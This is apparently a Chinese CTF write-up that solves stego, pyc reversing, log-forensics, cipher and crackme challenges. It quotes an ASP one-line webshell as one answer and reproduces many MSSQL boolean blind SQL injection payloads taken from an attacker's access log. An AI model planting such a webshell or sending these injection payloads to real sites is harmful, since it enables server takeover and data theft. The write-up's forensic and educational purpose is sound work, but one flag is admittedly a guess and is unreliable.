由于我没有参加比赛,所以WEB部分没有办法解题
打开网页
使用binwalk进行分析
发现图片文件还藏着zip文件,提取出来,但是文件中的文字很多,用notepad++都卡,目测是Base64编码,所以写脚本解密之后保存文件:
import base64
fp = open("secret.txt","r")
fp1 = open("secret.png","wb")
secret = fp.read()
#print secret
s1 = base64.b64decode(secret)
s1 = base64.b64decode(s1)
fp1.write(s1)
print
print "[+] Png write success"
fp1.close()
fp.close()
嗯,小姐姐还是挺好看的
这题是原题
<%execute request("images")%>,这个是一句话木马,然后用SHA1加密一下提交即可
好无趣
打开wireshark,追踪TCP流,看到里面有个数据包是在上传压缩文件的,所以把上传的数据导出来:
打开content.xml文件,看到里面实际上还有另一个压缩文件:
把 这些数据导出来,看到是一个pyc脚本:
逆向PYC之后看到如下源码:
# File: F (Python 2.7)
from sys import exit
def gold_room():
print 'This room is full of gold. How much do you take?'
next = raw_input('> ')
if '0' in next or '1' in next:
how_much = int(next)
else:
dead('Man, learn to type a number.')
if how_much < 50:
print 'You win VGVsbCB5b3UgYXJndj1mbGFn!'
exit(0)
else:
dead('You greedy bastard!')
def bear_room():
print 'There is a bear here.'
print 'The bear has a bunch of honey.'
print 'The fat bear is in front of another door.'
print 'How are you going to move the bear?'
bear_moved = False
while True:
next = raw_input('> ')
if next == 'take honey':
dead('The bear looks at you then slaps your face off.')
continue
if next == 'taunt bear' and not bear_moved:
print 'The bear has moved from the door. You can go through it now.'
bear_moved = True
continue
if next == 'taunt bear' and bear_moved:
dead('The bear gets pissed off and chews your leg off.')
continue
if next == 'open door' and bear_moved:
gold_room()
continue
print 'I got no idea what that means.'
def cthulhu_room():
print 'Here you see the great evil Cthulhu.'
print 'He, it, whatever stares at you and you go insane.'
print 'Do you flee for your life or eat your head?'
next = raw_input('> ')
if 'flee' in next:
start()
elif 'head' in next:
dead('Well that was tasty!')
else:
cthulhu_room()
def dead(why):
print why, 'Good job!'
exit(0)
def start():
print 'You are in a dark room.'
print 'There is a door to your right and left.'
print 'Which one do you take?'
next = raw_input('> ')
if next == 'left':
bear_room()
elif next == 'right':
cthulhu_room()
else:
dead('You stumble around the room until you starve.')
start()
找到里面的“ print 'You win VGVsbCB5b3UgYXJndj1mbGFn!'”,用base64解密后一半的字符串,发现是一个暗示
到这步卡了很久,跟其他几个大佬讨论了一下,说是用十六进制编辑器打开,查找关键字argv,然后后面那串字符带入即可:
后面出题人自己出来说是单表置换,所以解出来得可能是
我暂时认为flag就是 flag is How dogs is
所以出题人是恋爱了?然后再嘲讽一波单身狗?
用notepad++打开,发现是访问的日志
这里内容比较多,而且无效的信息也比较多,所以用py写了一个脚本,只筛选处访问的参数以及是否报错,同时也进行url解码
# coding: utf8
import urllib
fp = open("data.log","r")
fp1 = open("data_se.log","w")
for i in fp.readlines():
# 跳过注释
if i[0] == "#":
continue
# 截取访问的资源和访问的参数
reqs = i.split(" ")
decode_s = urllib.unquote(reqs[6])
print "[*]",decode_s
fp1.write(decode_s+"\n")
print "[+] write ok"
fp1.close()
fp.close()
因为这里需要知道攻击者拿了哪些东西,所以只要知道他从最总的目标表中dump出什么东西,所以只要从后面开始找是否存在明显的表名就可以了。
很明显的是,攻击者从theflag表中dump出了数据。
重点关注跟theflag有关的日志:
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>32
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>48
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>52
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>54|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),1,1))>53|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>32
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>48
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>52|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>50|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),2,1))>49
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>64
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>96
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>112|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>104|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>100|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>98
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),3,1))>99|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>32
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>48
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>52
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>54|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),4,1))>53
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>64
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>96
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>112|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>104|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>100
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>102|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),5,1))>101
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>32
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>48
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>52|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>50|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>49|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>64
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>96
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>112|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>104|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>100|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>98
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>99
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>32
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>48
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>52
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>54|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>53
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>32|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>16|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>8|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>4|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>2|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),33,1))>1|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
赛选的原则就是如果表达式逻辑正确,就不会显示中文报错提示
最后得到:53,99,54,102,49,100,54
解码得到:5c6f1d6
MZWGCZ33MM4GENJVHBRDSNJUGAYTSOBVGZTDAYRQGIZTINLEMMZTSNJVHBRX2===
很明显的Base32编码特征:全大写字母+数字+等号
直接base32解码得到flag:flag{c8b558b954019856f0b02345dc39558c}
snkeegt fhstetr Iedsabs tnaktrt otessha iiriwis tethees
key: howarey
Columnar Transposition Cipher
嗯,我就喜欢简单粗暴的,直接说这是列位移密码,具体的规则如下:
所以flag:ltisofteninthedarkestskiesthatweseebrighteststarts
题目:reverseMe
用IDA还原伪代码:
__int64 __cdecl main_0()
{
int v0; // edx
__int64 v1; // ST00_8
int v3; // [esp+0h] [ebp-1A0h]
const char **v4; // [esp+4h] [ebp-19Ch]
const char **v5; // [esp+8h] [ebp-198h]
int v6; // [esp+Ch] [ebp-194h]
int i; // [esp+D4h] [ebp-CCh]
int v8; // [esp+E0h] [ebp-C0h]
int v9; // [esp+ECh] [ebp-B4h]
int v10; // [esp+F0h] [ebp-B0h]
int v11; // [esp+F4h] [ebp-ACh]
int v12; // [esp+F8h] [ebp-A8h]
int v13; // [esp+FCh] [ebp-A4h]
int v14; // [esp+100h] [ebp-A0h]
int v15; // [esp+104h] [ebp-9Ch]
int v16; // [esp+108h] [ebp-98h]
int v17; // [esp+10Ch] [ebp-94h]
int v18; // [esp+110h] [ebp-90h]
int v19; // [esp+114h] [ebp-8Ch]
int v20; // [esp+118h] [ebp-88h]
int v21; // [esp+11Ch] [ebp-84h]
int v22; // [esp+120h] [ebp-80h]
int v23; // [esp+124h] [ebp-7Ch]
int v24; // [esp+128h] [ebp-78h]
int v25; // [esp+12Ch] [ebp-74h]
int v26; // [esp+130h] [ebp-70h]
int v27; // [esp+134h] [ebp-6Ch]
int v28; // [esp+138h] [ebp-68h]
int v29; // [esp+13Ch] [ebp-64h]
int v30; // [esp+140h] [ebp-60h]
char v31; // [esp+14Fh] [ebp-51h]
char v32[17]; // [esp+178h] [ebp-28h]
char v33; // [esp+189h] [ebp-17h]
char v34; // [esp+18Ah] [ebp-16h]
char v35; // [esp+18Bh] [ebp-15h]
char v36; // [esp+18Ch] [ebp-14h]
char v37; // [esp+18Dh] [ebp-13h]
v31 = 0;
v9 = 1;
v10 = 4;
v11 = 14;
v12 = 10;
v13 = 5;
v14 = 36;
v15 = 23;
v16 = 42;
v17 = 13;
v18 = 19;
v19 = 28;
v20 = 13;
v21 = 27;
v22 = 39;
v23 = 48;
v24 = 41;
v25 = 42;
v26 = 26;
v27 = 20;
v28 = 59;
v29 = 4;
v30 = 0;
printf("plz enter the flag:");
while ( 1 )
{
v6 = getch();
v32[v31] = v6;
if ( !(_BYTE)v6 || v32[v31] == 13 )
break;
if ( v32[v31] == 8 )
{
printf("\b\b");
--v31;
}
else
{
printf("%c", v32[v31++]);
}
}
v8 = 0;
for ( i = 0; i < 17; ++i )
{
if ( v32[i] != byte_415768[*(&v9 + i)] )
v8 = 1;
}
if ( v33 != 49 || v34 != 48 || v35 != 50 || v36 != 52 || v37 != 125 )
v8 = 1;
v32[v31] = 0;
printf("\r\n");
if ( v8 )
{
printf("u r wrong\r\n\r\n");
main(v3, v4, v5);
}
else
{
printf("u r right!\r\n");
}
system("pause");
HIDWORD(v1) = v0;
LODWORD(v1) = 0;
return v1;
}
这里看到两个关键的逻辑
1、前面17位必须和byte_415768数组中的相应值相同,而相应值可以在最初变量赋值的时候看到
2、最后5位是“1024}”
用IDA找到byte_415768
所以很简单,所以写脚本就能算出来
# coding: utf8
s1 = 'IKfxEeft}f{gyrYgthtyhifsjei53UUrrr_t2cdsef66246087138\0087138'
l = [1,4,14,10,5,36,23,42,13,19,28,13,27,39,48,41,42]
tmp = ''
for i in l:
tmp += s1[i]
tmp += "1024}"
print tmp
得到结果
待更
因为一些事心静不下来,所以改天再更新